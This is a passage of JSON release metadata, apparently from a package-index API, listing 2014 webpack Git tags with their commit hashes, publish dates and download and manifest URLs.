/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"